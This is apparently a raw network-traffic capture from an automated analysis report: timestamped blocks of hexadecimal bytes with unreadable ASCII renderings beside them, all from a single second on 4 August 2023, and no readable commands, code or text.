                                                                                      2023-08-04 16:48:40 UTC2666INData Raw: dd 57 75 da 10 8f 50 6e 6a 29 43 30 3a 66 6e 5f e3 19 53 1b 22 fe 5b 70 5f 94 bc 81 11 d4 ff d1 d1 c9 4c ea 76 e0 6f de 64 9e aa 08 23 59 9a df aa b1 dc 64 41 af e1 6d dc b7 06 5c 07 e9 bb 97 af 88 a9 c9 ff aa af 50 c5 a3 13 1a 54 73 13 82 da e3 0e 0f a4 ad 97 95 c2 49 23 35 0d 16 af e8 29 2c cd 4d db 1d f8 c4 a2 b4 95 64 41 0f 3a 87 d8 2c 73 40 54 0c f1 e4 ce 5d bf 27 23 25 78 8f 4f f6 f7 e5 e7 ee 36 e1 d8 e3 83 0f 47 ae a4 3f 00 53 88 c4 93 ff f4 ce ea 83 44 d0 ea 99 27 68 48 9a f4 4a c4 81 42 0b ec 64 06 50 7a 0f fd 74 73 c7 df 30 13 df 0a 3a e1 2b fb e4 06 82 10 51 86 7f 5c 8b 22 c9 63 fd c3 35 b5 36 47 f7 1f 29 1c 64 0b 04 96 f8 2f f8 8b 57 a2 1a 09 49 80 8a 55 9b af 08 fd c8 2c 30 3a 06 b8 43 e3 1e f6 d8 ec a9 1e ba c6 f3 17 37 a2 76 47 89 09 db 3d
                                                                                      Data Ascii: WuPnj)C0:fn_S"[p_Lvod#YdAm\PTsI#5),MdA:,s@T]'#%xO6G?SD'hHJBdPzts0:+Q\"c56G)d/WIU,0:C7vG=
                                                                                      2023-08-04 16:48:40 UTC2670INData Raw: 41 6b ae 65 f0 5d 2e de c4 f7 77 37 51 8f 5f 32 be 00 29 3e e5 f1 09 db 14 fb 6f 1c 2e ff b4 b0 b5 35 c4 3f 50 fe 40 00 6d 33 f7 80 e9 ea ef 03 5c f1 5a 62 ab 04 f0 e1 5e 09 1f 2c 34 5f a9 7b c7 ab ea ac 29 28 65 ba 5f 08 a1 c3 65 cd 0e 2e 94 23 37 54 12 58 26 f8 17 82 84 01 cf cf 89 c3 35 f9 66 5f c6 5d 14 11 a9 5d 66 3e 82 8b 48 e1 f5 9b 64 ce b3 e8 c3 01 7e 0e 4b 3e 71 51 83 93 a8 1c 7f 40 61 8b c8 1f 81 4f 4c 03 b7 00 dd 45 00 76 0f 42 60 b3 43 08 a0 52 9b c4 43 e9 92 2e 38 4f 76 c8 31 00 ea 9e 14 e8 8f cf 2f 7d 4d 1e 6c df 23 d2 24 e8 82 9a 4c 4c 0b 9c 5d 9c 3b ae 01 98 35 a0 94 71 64 ab 82 d7 1a 1e cc 17 16 db ea 5a 3b b8 42 48 23 70 24 16 68 dd df 4b 13 2f 41 a6 6b 15 f7 99 6e 4c c4 8f 03 f4 b9 45 0b 0f 87 81 a9 16 e5 16 b2 7b b0 43 ee 02 f6 2c 1a
                                                                                      Data Ascii: Ake].w7Q_2)>o.5?P@m3\Zb^,4_{)(e_e.#7TX&5f_]]f>Hd~K>qQ@aOLEvB`CRC.8Ov1/}Ml#$LL];5qdZ;BH#p$hK/AknLE{C,
                                                                                      2023-08-04 16:48:40 UTC2674INData Raw: a4 bf 26 6e 70 a5 59 59 e1 e3 89 0a ce 4e cf 21 36 47 6d 51 85 e7 84 5a fb 0b d9 67 ce 55 af 33 9f 2e e1 76 ed c7 7e 83 88 f4 ab b3 38 92 99 b0 ab 20 6f 9c 76 96 9d 99 6f ab b4 d9 02 30 4d 57 f2 ed 61 66 2c 9a 9a ba 6f a3 34 03 4c 2d dd 28 6e 0e b3 77 d7 73 1e 20 fb 0f 0d 12 c7 a3 16 35 52 7a 75 5a e2 85 e2 4e d7 5f b9 4a 04 ea 19 86 9b 4d c1 22 cb dc 4f 78 18 88 bc fb 10 52 ab 00 f6 42 59 b3 12 61 ce ce 29 20 49 1f aa 11 fb b6 b6 ae c8 5c ff 63 11 40 fe f1 0b b9 95 75 6b 2d 7a 42 99 24 24 ef e4 3e eb 96 74 b9 be c3 1e 38 99 e2 71 99 10 54 fd c0 4f 32 ad 50 e7 ef f6 9c 90 3e c9 db 4c de 77 5f dd 45 b6 c7 1c 55 29 7b 43 38 0f 93 5c 78 bb be 21 4e 13 fd a5 f0 5a 4e 8c e2 a1 56 e7 9a b7 4d 13 55 03 7c a8 7f c2 57 1e 0a e9 19 5a 1d fb cc 21 1e d0 88 f4 6c 4c
                                                                                      Data Ascii: &npYYN!6GmQZgU3.v~8 ovo0MWaf,o4L-(nws 5RzuZN_JM"OxRBYa) I\c@uk-zB$$>t8qTO2P>Lw_EU){C8\x!NZNVMU|WZ!lL
                                                                                      2023-08-04 16:48:40 UTC2678INData Raw: 74 9a b3 90 54 63 76 ea 1e c2 b0 0a 04 62 4f b2 90 61 4a f1 54 82 3c 5a f6 6e 8a 6a fa 72 aa 76 8b 9c dd de 7e f4 90 bd db ef 32 9d 8c d5 6a 8f ff 58 29 f7 1e 53 ef 5d cf 01 b8 7f 94 ea 99 aa 15 67 50 2a be bf 36 b5 13 ad 1f ca 3a dc 49 1e d5 df 18 c0 14 43 b7 83 0d 84 a7 51 a8 5d 53 aa b9 e6 67 00 25 d6 05 af b2 c1 d6 ae e7 1b 00 59 22 9e d9 ff ff e5 19 e5 f5 2a 69 b0 92 59 0b 58 f6 90 18 cb 9b 7a cb da 8e ad 94 5a 1f 22 1d 78 7e 3b 53 b8 a7 97 03 7d 2f 3b 49 86 67 3b ce 6c 1b 0e c3 78 99 8c 80 d1 09 bf 6a b9 dd c4 9a a1 ae 8d 73 7f 33 a1 2d 76 c6 5f 50 41 c5 7f be c6 aa c3 e8 aa a5 6d 18 a0 bd 39 68 87 e3 73 cd b9 84 eb 25 78 b4 41 2a fb b7 28 ca 79 fd 54 ff 50 ce 1e 3c 44 5b e4 44 cb 54 51 ce 33 b5 e0 fd 35 0d b4 9e ee 88 ae 83 b3 5b 43 15 8f ba b7 2d
                                                                                      Data Ascii: tTcvbOaJT<Znjrv~2jX)S]gP*6:ICQ]Sg%Y"*iYXzZ"x~;S}/;Ig;lxjs3-v_PAm9hs%xA*(yTP<D[DTQ35[C-
                                                                                      2023-08-04 16:48:40 UTC2682INData Raw: a0 db 4d 80 2b 82 73 aa 5f 64 cc da cb ee de 16 d2 e4 e9 e6 97 3a c9 cb f9 aa 6f d2 13 26 e4 fa e4 f3 a6 57 66 f3 89 e2 ff 9e 91 17 b2 90 8b a1 d2 80 18 4e e5 0d be a7 24 4d 27 5b 5b af 09 b1 7d 9b 76 15 a2 9c 84 b8 d6 c9 1e 4b a6 7f 84 7d 0d f7 d0 10 d1 2b c4 e2 d5 cc be c3 89 9f cd 4a 9f b4 22 22 5f 2e 58 ba 0c 5c 81 67 f1 2f 5f 94 b0 f3 f8 f2 4a 00 07 5d de 00 ae 06 8f 45 b2 a4 83 89 ba b6 ee d5 85 de 02 b1 6f 44 38 94 b6 ea 40 9f 84 27 80 7a 5d b4 4c 4c d5 61 09 bd 3b ea 60 6b 05 27 0d 85 d2 35 b9 6e eb b5 36 d2 cb 76 9c 18 bd d3 6f 73 53 ec 8d a8 10 a1 82 34 e6 48 00 32 01 92 8f 98 de 75 8d 73 c2 cb c8 17 d9 42 63 ce 92 ab dc ad 50 62 65 7a 46 f4 fb b3 2a 02 4f a9 09 21 5f 25 0c 84 a6 8b 12 2a 8a 29 6d dd 61 6a 00 77 b7 a6 bc 32 4a 57 6f 6f 85 f4 5e
                                                                                      Data Ascii: M+s_d:o&WfN$M'[[}vK}+J""_.X\g/_J]EoD8@'z]LLa;`k'5n6vosS4H2usBcPbezF*O!_%*)majw2JWoo^
                                                                                      2023-08-04 16:48:40 UTC2686INData Raw: 25 c0 b6 7d 7b a7 c4 93 5a b3 90 62 78 41 e5 00 50 79 84 c9 e4 92 d9 76 79 42 fb 71 35 0c 9b 85 93 62 d9 ae 3e b6 79 b8 0a ee d6 cb 3f df 98 9b ac 35 a9 09 6d 6d 0e c7 0e 3a 3d 39 c3 ad 6c 49 ca 73 d7 c1 eb ae 99 88 71 7c 73 4a 2c b8 05 9a 5b 6f dc 36 68 0a 0e be 3d 65 38 d2 32 4c 56 e3 ff 9a e3 39 c3 d5 dd 58 0f 95 17 3d ea 8b b3 08 58 92 5c 24 95 07 f3 7c ce e4 bd 4b cd c0 8e 79 af 9e dd 4d 28 6f 35 2e b8 a1 c1 74 87 eb 38 96 b1 15 63 ff 36 b5 ae 8d 75 ad 16 f2 1b c3 fd 26 57 53 45 bd 08 8d 4b 21 80 84 6f 3d 69 92 cc 93 f6 2a 90 76 6f 5b 65 53 19 95 e9 af 17 1c 08 fe 6f b6 b7 b5 57 d6 30 c6 e3 88 eb b8 52 a0 41 7b 6e c7 46 52 f2 26 33 b1 a2 2a a8 c9 a8 2a 92 1e 09 3c c2 fd 99 dd ef f6 d2 1b 71 72 d4 3c 7a a6 9b 3d 97 fa 9b e9 97 13 9b e7 84 41 f9 fc 4f
                                                                                      Data Ascii: %}{ZbxAPyvyBq5b>y?5mm:=9lIsq|sJ,[o6h=e82LV9X=X\$|KyM(o5.t8c6u&WSEK!o=i*vo[eSoW0RA{nFR&3**<qr<z=AO
                                                                                      2023-08-04 16:48:40 UTC2690INData Raw: b3 93 92 c6 6c cd 2d b8 51 a1 b3 ff ac e8 dd 06 a1 63 05 87 1c 66 36 47 ca 75 99 56 4e ff b8 57 85 6a 16 bd 36 98 6f af 7f c8 95 bf 75 92 23 11 98 c1 97 6d 8a 34 a1 af 83 82 78 e2 fb 07 8c 98 56 98 31 e7 02 0f 4f ff 2f d4 d0 67 99 38 bf 10 e9 c6 f7 90 3c 14 d1 67 10 d6 d3 f5 88 58 c5 29 d7 02 20 63 25 28 11 c3 6b d0 e5 fa ef 13 f9 ac ea 11 5e aa 6e ee d2 ee 67 45 df 6b 28 66 06 be 6c 6f 29 c4 76 76 9d 9e b5 a5 f1 82 d4 01 39 31 0f 19 10 0f 81 d4 f5 24 7e ac 4f 49 e4 97 c0 03 3b 46 fc f6 4b 37 31 f2 2a cc 19 17 8f e1 49 de da 03 0c c8 fc 78 d4 d2 54 9a 69 23 23 94 7f 43 0f 1a f1 1b c2 19 f9 ef ba a4 53 5f a9 d3 bf de b5 63 83 4c 62 d2 ec 1a 6b b4 9c 4b 84 8f d1 8c cb 95 18 72 2d 9e 2a 9b aa 45 39 e8 65 ca 30 df ac 18 6a fc af fb 66 82 a8 95 55 e0 f7 0a 04
                                                                                      Data Ascii: l-Qcf6GuVNWj6ou#m4xV1O/g8<gX) c%(k^ngEk(flo)vv91$~OI;FK71*IxTi##CS_cLbkKr-*E9e0jfU
                                                                                      2023-08-04 16:48:40 UTC2694INData Raw: de 6e 8c c3 78 41 e8 b5 0c f7 af 01 c2 89 c3 0c cc 1e c3 a0 58 72 0d be 66 ab d6 d4 a8 f1 44 1e 87 d4 ec 1b 78 3a e7 58 5a f1 15 4c d5 93 83 f6 7d 92 f6 3c 20 d8 a5 19 ee 75 65 bd 67 d7 65 57 b5 67 4a f6 7d 56 57 6d 62 7b bf b1 4f 33 ce da eb 93 21 4a df 67 0f 62 ae 31 bf 3c b2 d2 8e e4 0e 67 e3 62 a2 b8 e9 85 e7 fd 43 df 29 d7 34 11 c0 1b a8 47 ea 99 2c 03 e5 37 33 89 e7 0f f4 90 11 fd 68 2f f0 ae 39 89 ac 1c 7b aa ae 95 4c 34 da dd f5 6f 59 9e 21 16 10 fc 65 30 92 e8 54 72 75 5c 81 e7 b6 79 7b fc 65 48 5c 6b 97 84 c9 df 2b 78 cf 6a 28 af 90 db 00 72 2d 2a ac cf e4 ed a9 41 e5 0d c5 c7 93 44 5c 81 29 86 9d f4 d3 bf 2d 0e 83 26 7a 61 5f 17 46 5f d9 f7 24 df 28 68 91 4b 80 c4 6c 3f aa f0 72 cc 47 7f 3e e6 5c 90 03 dd d0 e1 a8 9a f6 00 23 40 92 e0 28 1d c7
                                                                                      Data Ascii: nxAXrfDx:XZL}< uegeWgJ}VWmb{O3!Jgb1<gbC)4G,73h/9{L4oY!e0Tru\y{eH\k+xj(r-*AD\)-&za_F_$(hKl?rG>\#@(
                                                                                      2023-08-04 16:48:40 UTC2698INData Raw: aa c2 ad ff 81 44 42 fa 64 86 67 b2 2e 2b 10 de db b9 27 48 da c1 1f aa 7a 05 34 c9 07 2d ba 49 9d 74 56 bc e3 de d5 10 96 30 c3 c0 bf f7 4e 4f c2 98 3b 97 05 a1 48 17 a3 ec d0 cc d7 c4 8e c0 fb 15 c7 e2 08 05 ed 08 1d a4 0c ad af 8a f6 24 bf b1 97 5b 4a 46 86 20 04 d1 62 c3 0c c1 bc ca 98 49 1b 02 f4 14 cf 6a 85 46 98 c6 e1 cf 0c c0 18 3c 29 66 9b 10 d5 b1 8b c3 31 e4 c9 91 29 6c c7 9d 0e 4d 51 84 76 8d d5 d0 f7 18 84 b7 63 6c e1 99 af 14 3d a3 0d 4e 34 fa cc bc 2a 96 a0 6f fb a8 09 0c 1f de c0 28 30 3c 0d c1 e3 84 07 d5 30 39 cb fc ac 3d 02 26 60 2c 9c a2 13 07 60 10 17 51 a4 ad 0a 9d c8 c9 fc 1e e3 c8 7c 8f aa 32 b4 31 bb d2 2d e7 38 df 1e 2d 5b 18 f1 3b 6d 4f db b5 5e 5f 64 84 33 01 5d 18 f0 23 41 31 62 9c 2c 24 6e 7e 8a 76 49 2d 9d a6 3f 43 af b7 51
                                                                                      Data Ascii: DBdg.+'Hz4-ItV0NO;H$[JF bIjF<)f1)lMQvcl=N4*o(0<09=&`,`Q|21-8-[;mO^_d3]#A1b,$n~vI-?CQ
                                                                                      2023-08-04 16:48:40 UTC2702INData Raw: 01 10 49 cd af 75 68 53 52 a8 d9 6a 06 c5 c4 ff 68 4f ed c9 bd b4 c6 3a c1 23 78 a1 38 7a 11 5d fa 2b db c2 e2 89 99 f9 a9 63 b3 1c db 94 12 be 92 64 2e 3c 09 28 3a 50 a8 5c 39 51 c5 46 77 5b 22 25 fd 2f 20 72 c8 f2 72 a4 6f 48 04 f6 f9 e6 9f 91 68 25 87 47 e3 e9 74 fa 79 af 86 10 4f cf 61 44 e2 69 e8 fd f2 d1 05 ab 24 15 9a 01 62 e4 d9 02 39 b0 74 12 74 c7 b6 41 d5 9e b9 61 29 98 6e 69 68 3d 97 63 74 33 a7 b3 7a 42 d8 6a 2d 46 a7 9a 3d 15 32 68 62 7a b3 8e f7 16 b6 ee e7 00 8e a9 df c4 45 ae 70 39 21 01 82 08 17 54 ee df f2 5e 13 ec 92 0e e0 a6 ca d0 51 c8 bd 3e 34 bc 6c 94 c2 02 9f 9c 24 e6 34 5e 05 db 63 70 c0 8c 68 ce ad 38 b7 54 9c b5 10 08 28 7f 0c 5c 7a 4a b8 ca f5 54 59 1d ef e4 39 60 a2 d3 16 ba b7 b6 0f d0 c2 0f 1d b5 ef b9 43 c9 56 2c f4 43 20
                                                                                      Data Ascii: IuhSRjhO:#x8z]+cd.<(:P\9QFw["%/ rroHh%GtyOaDi$b9ttAa)nih=ct3zBj-F=2hbzEp9!T^Q>4l$4^cph8T(\zJTY9`CV,C
                                                                                      2023-08-04 16:48:40 UTC2706INData Raw: 76 19 ed f9 c5 20 5b fb 5b 6b 04 bc f1 27 18 a5 e8 02 82 7e ac 70 3e d1 e0 37 52 f6 ae 5d 13 fd 05 66 b6 ac 2d ef 2f 78 a9 a1 08 31 d5 b5 2a 3a 04 11 36 92 5a 79 40 29 59 58 96 f6 04 d8 cb d6 e3 66 ba 1e e6 a7 ba 19 f1 f5 fd 30 d6 d1 04 87 6c 5c ab 83 cf af a6 96 e8 35 51 e0 74 44 18 8a e9 bd e0 49 17 9f 92 c1 64 af a9 15 eb b4 b0 60 fc 87 ff 90 80 29 eb 50 da 5d 27 ef 96 26 dc 22 07 15 8f 5e bb 67 6d 5b a8 e4 8c 87 e7 67 63 70 43 c8 7a 96 c9 55 58 bc 8c a0 e3 51 8f 42 10 62 ce 49 4d f7 35 a1 91 d4 41 4a c9 4d de f9 fb cc 45 fa ca 2b 6e 4b 6f cc 5d 3b 94 2f 5c a3 62 86 f2 f7 92 a0 4f c9 f9 dc f9 49 92 2f 2e 11 0c 83 fb 44 07 3b 25 b1 e1 d5 30 f3 b5 c0 6a 51 c8 cd 2b d1 d5 b9 c5 c5 9f 2a b0 33 b4 4b 04 2d 31 a8 e3 01 98 06 e4 cc 44 26 ca b5 21 25 5e 5f 04
                                                                                      Data Ascii: v [[k'~p>7R]f-/x1*:6Zy@)YXf0l\5QtDId`)P]'&"^gm[gcpCzUXQBbIM5AJME+nKo];/\bOI/.D;%0jQ+*3K-1D&!%^_
                                                                                      2023-08-04 16:48:40 UTC2710INData Raw: 02 74 3c 41 f3 61 ea 8f 40 ee 77 0c 91 f8 a6 f6 9b 90 f1 d3 eb 75 3d 85 ba d4 82 d2 c1 52 0d 4c 36 8e 6f a4 a4 ff 47 5d e8 1d 9d bc e7 3f 12 86 79 2b 74 d2 ee dd a5 73 ad 10 11 bf 6c 18 4a 71 0a 7d f6 0d b3 e3 70 c3 71 4b b4 18 7d 71 b8 aa b0 d2 9d fe 2c 47 df 66 46 41 e6 66 9e 2a 87 0a d3 8a 1a 1e 99 ed 7f 28 d0 44 f6 1b e4 6a fc cd 5f bf 6e 17 89 c8 fc b2 fd 4f de 31 28 75 71 c8 e2 4d b7 2a 6f bf 25 7f ee 1c d2 ea da 81 37 4a e0 1c c5 0d 6d da 09 88 16 ea 70 12 f0 38 46 a3 85 37 72 f2 28 f2 bf 1d f2 84 b9 c9 e8 a4 ee 68 88 3c 20 d9 ad 6f fd 63 cd d8 70 f5 db 07 a5 69 f1 15 de 2d be 97 87 56 27 51 15 1b fc 56 bb 06 ea b7 5f dd 6c a6 42 02 e1 46 94 fc f9 79 9c 5f 81 6e fe 7c f2 0a 91 99 51 c6 b5 a1 18 2a 0b 3b ed 89 98 ee f1 fa d9 33 59 f7 99 2d 9b fc 3a
                                                                                      Data Ascii: t<Aa@wu=RL6oG]?y+tslJq}pqK}q,GfFAf*(Dj_nO1(uqM*o%7Jmp8F7r(h< ocpi-V'QV_lBFy_n|Q*;3Y-:
                                                                                      2023-08-04 16:48:40 UTC2714INData Raw: 40 5e 31 67 f3 cc 30 d1 21 eb 89 95 a2 10 d8 33 df 35 be 32 f7 d1 d9 79 f6 01 c6 6a 0a 6e c7 61 d4 47 c4 82 a9 28 37 42 4a 87 df 2c 81 f6 bf 1c 71 5f 08 10 55 0e a3 38 87 4a e6 3f 6f ad 06 29 99 b6 1b b2 80 1b d6 d7 67 18 91 e2 53 14 97 d5 96 f7 4d 9b be b9 10 1a 49 61 74 74 44 d7 d8 c2 d8 0d 02 3f 85 ed 70 3a 40 85 a4 50 4a 60 c5 0d 2a 07 cb 25 b1 26 17 7c 0e 54 58 87 5e e0 f6 a5 cd d2 13 e2 5e c0 94 56 29 77 1f d3 2e ef a2 f3 19 be ab 75 c8 c3 55 40 82 f6 54 f9 9f 38 0e 1e 5f e8 d6 be 77 6f ec 58 69 3c 8c 49 4b b1 31 68 78 e5 f9 cb a7 39 d1 ea 52 47 2d 59 68 08 75 d3 30 ff 9b e5 f7 13 b3 a4 31 20 41 9b 7b ed 33 aa fa 5f 15 d4 ad e5 84 db 28 20 74 f9 4c a0 a7 d3 fa ae 3b a9 9d 6d d3 b4 27 28 11 25 61 ca fa f7 d6 09 62 70 8e 96 e5 e9 5d 8b a1 0f 25 6a 31
                                                                                      Data Ascii: @^1g0!352yjnaG(7BJ,q_U8J?o)gSMIattD?p:@PJ`*%&|TX^^V)w.uU@T8_woXi<IK1hx9RG-Yhu01 A{3_( tL;m'(%abp]%j1
                                                                                      2023-08-04 16:48:40 UTC2718INData Raw: 1c e1 10 25 2b 46 d1 14 3c 66 e5 65 cf c3 5d 6c 45 94 16 3c fe 8d 51 7e 7e 67 48 9f 6c 73 2e 11 d0 82 68 50 ae 13 03 5d 1a 4b 99 75 e9 69 78 bf 4c ef 23 64 aa d5 ed ee 11 0b 58 a7 6d d6 45 c0 8f 7a cd 56 11 ea 95 67 c7 66 ec c0 5c 61 fe 8d 9e 46 2f 00 d3 93 63 62 ff 59 2a 80 46 d1 73 d1 97 83 4d c9 19 09 90 a2 a0 4f 50 42 99 99 43 8f 43 4f 85 f6 e5 51 3e 64 7d 42 bf f9 a2 16 16 91 1b 61 ec 70 4e d6 5a 67 94 d0 2e b7 c2 86 75 a7 81 1d c5 ee e6 3a 3c f0 3d a2 e3 fe e1 08 9e ec 83 66 04 1a 8e 8e 2e 3f 91 5f 0e c6 93 e5 98 23 2c 3a 02 cf db 16 d2 4f 12 6d a6 f4 26 76 67 e4 09 3a 3b 44 97 58 e9 da be a9 ff b2 ff 7f f6 17 8d b0 eb 17 8b 4b ac 72 27 cf b9 28 d8 dc 3f 9f 61 42 dd 18 ac 79 5b 72 a6 d8 c8 01 9f 35 d5 c9 a6 fd 29 45 68 3f 09 a5 47 8d 93 26 94 67 01
                                                                                      Data Ascii: %+F<fe]lE<Q~~gHls.hP]KuixL#dXmEzVgf\aF/cbY*FsMOPBCCOQ>d}BapNZg.u:<=f.?_#,:Om&vg:;DXKr'(?aBy[r5)Eh?G&g
                                                                                      2023-08-04 16:48:40 UTC2722INData Raw: 4d b0 2b 0b 8a 90 9d c4 22 9c 01 f8 67 8c e6 3b 74 af f3 7c 3a e2 d5 9b 04 8d 51 e7 55 5d 02 b9 f7 61 59 a7 83 9b a6 dd 86 39 25 dd 8d 0b 55 0b 45 83 82 a8 2d c5 af 09 65 7f 17 dd 34 29 44 e0 04 e4 2f aa 4a 80 bb 25 92 af f2 4d b9 21 e0 32 18 9f 11 f1 bf 5d 1a 63 b5 b7 62 f2 29 18 5a d3 bf ae f7 f1 b3 ec 7c aa 82 ed cd d8 0b 58 55 d6 f2 96 93 02 eb 9d ee 12 8a dc fb 68 71 44 26 49 08 b9 70 40 b8 37 4e 73 40 0e 77 95 22 c5 a9 4a cb 9a 66 71 c5 32 29 c6 19 4d 22 4e 41 80 f9 0a 7f d5 ed 31 31 91 9e 81 6b 91 4d 47 09 b4 5b 80 99 36 5c 0d 12 bd 57 89 28 f6 76 21 7a 70 5e b3 fe 4c 01 77 4e 98 a5 09 9c 27 8a 87 92 c8 7f 43 2b fa 55 37 06 e4 33 cc 81 b0 e7 ef 45 b2 60 04 2b c3 9c 1e e3 54 6b 21 ee 1c 57 ea b0 34 53 f6 ef c7 6c 26 94 78 2d 22 41 1c fb 7d bd 36 fc
                                                                                      Data Ascii: M+"g;t|:QU]aY9%UE-e4)D/J%M!2]cb)Z|XUhqD&Ip@7Ns@w"Jfq2)M"NA11kMG[6\W(v!zp^LwN'C+U73E`+Tk!W4Sl&x-"A}6
                                                                                      2023-08-04 16:48:40 UTC2726INData Raw: b8 44 34 b6 f2 67 7c bf 40 ee 21 cd c6 17 63 90 6c 71 d2 d4 fa 68 86 1a ce f1 df 4a 8c 72 04 23 7b a8 c8 5c 40 cc dd 34 9d 28 ba 68 a0 86 f4 d2 b0 f9 57 2c 2b 2d a1 62 a8 0f 02 66 38 37 ed 9d bd ac d4 97 94 d1 43 ad dc 4b fe 53 4e d5 61 bf a7 13 43 e7 ef 05 09 e7 5e d2 99 2f c5 1a 41 4f 8f 01 b0 e0 2a 1e 20 0d b6 f2 22 ad f4 dc 70 c6 f6 d9 16 ad af ec 0c d2 c9 46 3c 4f ad 38 b1 8b 7c 2f d5 1e b0 0f 7c 4a 9f ce 69 02 a7 38 88 eb 13 c8 da 73 dd 8c 50 3d f4 a9 71 59 db c7 eb c9 50 63 f1 87 05 93 ba ce 66 b8 e7 b8 ad 96 35 ab 2d d7 5c aa 71 a1 77 1b ff d4 4e de 61 98 c3 1c b1 aa f1 1f 6a cb 4f b7 22 74 ea c1 e2 86 42 73 87 3c 67 cc 73 8e 5f eb 06 7a c4 a6 79 5f f6 a0 9d 9f 10 78 df dc 88 6c 48 65 51 d5 54 0f 1e 0b 0e 96 c5 1b 65 cf db 2b 7a 56 be 15 67 8e 1c
                                                                                      Data Ascii: D4g|@!clqhJr#{\@4(hW,+-bf87CKSNaC^/AO* "pF<O8|/|Ji8sP=qYPcf5-\qwNajO"tBs<gs_zy_xlHeQTe+zVg
                                                                                      2023-08-04 16:48:40 UTC2730INData Raw: b9 7a 9b d5 79 13 91 98 5e 50 f6 8a 84 d6 58 52 61 20 6b cc 74 42 6a 82 e7 dd 7e 4b e5 3b 56 ef 26 e9 95 01 05 d7 51 f4 9a 07 d0 94 eb 9f db c3 eb 65 e4 e8 d0 e4 b1 c7 59 67 0d 6d 99 21 7b 22 5c de a4 51 e3 99 cd ba 67 ed 22 dd 27 94 6a 4a 5c 38 22 49 e3 be b8 6c a7 15 b9 78 0a 75 69 ac a7 1c 73 bf bc c4 c7 13 4e 72 c5 bb 83 a3 4e 33 34 be d8 bc 4f 6e 10 c1 de 10 85 7f 2d 7a d2 76 f2 77 1c ef 22 c1 a1 ce 14 9f 24 65 93 ab 4c 4e d0 fd 07 cc 39 dd 79 a3 62 7c 83 39 0a a3 4e 9a 10 8d 31 1d 6f 79 78 c2 d3 d3 1a ee fe 27 8f 54 19 9c b1 37 c2 9b f5 4e 7b 12 7a 24 18 18 fe 55 e5 6f f4 3d da 39 60 f0 76 c1 07 a5 ce fe 7d 27 a7 b5 21 90 f0 cb 2f 98 24 f0 16 60 1e 4b db e0 f4 32 49 22 d2 e2 b9 08 ac 39 68 30 2a 56 07 a0 61 22 af a7 4f e0 2a f4 30 86 08 ba 47 53 ad
                                                                                      Data Ascii: zy^PXRa ktBj~K;V&QeYgm!{"\Qg"'jJ\8"IlxuisNrN34On-zvw"$eLN9yb|9N1oyx'T7N{z$Uo=9`v}'!/$`K2I"9h0*Va"O*0GS
                                                                                      2023-08-04 16:48:40 UTC2734INData Raw: f5 71 b6 0a 8c a7 9b b6 e3 29 b3 da 5a 05 5e 24 92 4e 7a d7 b3 86 06 36 7d 75 8d 8b 94 e8 32 6a ef 6f 11 de b0 32 ae 85 a6 3d c2 b7 e4 1d 57 36 1e b3 33 a2 02 3e 50 07 17 dc 4f 78 25 6a ea bf 05 2f 94 10 90 2a 82 37 bb 39 b9 46 f2 2e 19 cc f1 31 af 9d 7d ca 1e 82 1c c6 cf 95 0f 9c 4d f1 c5 33 74 7f ed 0f 34 f6 0c 6f ff 88 24 01 56 68 20 5a ec 68 7e 6f 4e f7 3f ca 93 b5 70 d0 1f 65 c6 e4 74 b6 49 90 85 cb 29 ba c5 09 9e 32 c6 1b 2c e8 8a f9 f9 c3 ed ac 4e fc 04 e5 bb 6a 20 ed d6 01 6a 4b b8 26 3f 04 87 20 c6 88 93 8e fe ff 00 76 a3 db bf 60 8d c6 7b 8b d8 55 3d e0 f9 a7 f9 3b 98 a9 74 31 c2 34 86 95 87 8a 9d fc 99 96 d8 1c 35 34 5c a1 74 c6 9e 63 27 36 3b 53 c3 6b 16 8c ed c2 54 25 51 80 cb b7 8b d3 53 4b 97 21 7d f2 88 4c ef ca cf 83 43 e9 23 0f 7b b4 4e
                                                                                      Data Ascii: q)Z^$Nz6}u2jo2=W63>POx%j/*79F.1}M3t4o$Vh Zh~oN?petI)2,Nj jK&? v`{U=;t1454\tc'6;SkT%QSK!}LC#{N
                                                                                      2023-08-04 16:48:40 UTC2738INData Raw: da 32 69 a6 7f 0f 08 6b d7 78 ee 8b 53 6e bb 1d 1e 8b e7 bd 65 49 a4 0a c0 17 fb 47 c2 9d 36 92 8a c7 0e 9b 30 7f 63 7b 8a 8b c1 2c 35 2a 60 df d3 a4 fd cf 45 61 5e ad 4a f8 70 ed 8b 38 f2 a8 19 f6 fe 28 29 09 15 76 a4 41 04 b2 48 9c 1b cb 54 ab 54 f9 fd 73 69 d4 09 e2 bf 54 e9 77 68 66 cc 9c 71 e9 61 1e e7 ca ac af ae f7 d1 f9 75 4a d0 2a 1b d8 0a 37 63 00 25 84 6a 26 a4 c5 97 4f 11 40 07 64 c8 96 48 ae be d9 c0 66 cd 89 af 7b e0 db 92 85 7a 29 bf 42 e5 0e ab e6 84 e9 ba df 25 73 b5 0f a8 ef 99 f2 a6 df 83 3a b2 65 24 ad b8 be 55 20 e1 43 91 d9 78 1f ad 0f ca b1 70 0a ec 5d 54 18 a5 65 40 64 df 8b 75 b3 3b e5 e0 81 0d 5d 42 d8 e4 db e6 b2 71 34 1f 25 ad a7 86 0c 4f 65 e7 d5 cd 81 72 6b 5c b2 8e ec 61 c4 68 05 e5 40 0b cb 3f 8c 55 82 31 bb 04 ad c1 46 e0
                                                                                      Data Ascii: 2ikxSneIG60c{,5*`Ea^Jp8()vAHTTsiTwhfqauJ*7c%j&O@dHf{z)B%s:e$U Cxp]Te@du;]Bq4%Oerk\ah@?U1F
                                                                                      2023-08-04 16:48:40 UTC2742INData Raw: c7 95 e3 df 59 be a0 ab f2 e6 21 cc 1c 13 13 26 ca 20 fb af 1e 3a 03 2f 0b f6 e8 61 bb 95 71 71 67 ad a0 4f 33 97 05 bd b6 93 18 63 45 50 cb c0 15 21 3d 0d cc 5c 83 e9 59 50 6b 62 b9 76 6b 90 db ab 28 11 59 04 a5 a9 8a 21 d6 06 96 37 07 a3 29 d3 10 fe 9f 88 bc 72 d5 85 86 ba 0b fc f6 10 cb 8e 21 a7 f9 85 83 0b 7b cb 12 b7 2e b3 14 29 3a b2 20 64 6f ac b0 ea 51 24 19 7c 04 d0 af 2c 3c af f0 19 73 24 6c aa b2 1a cf 3b 95 c9 ad 98 6d bc 11 f0 d6 5c ca a8 00 c8 fb 6b de aa 1c f5 61 be 36 84 3c 94 cd a5 8e 7f 2b cf 9d b1 c7 8d ac 1c 96 f2 3f 84 ce 70 8c f2 17 0d 45 08 f4 27 68 12 10 33 32 d5 77 8e 18 0d 0d 92 40 0b 29 e8 85 80 fa cf d9 06 dc 03 d9 c4 39 02 9a ab 63 e4 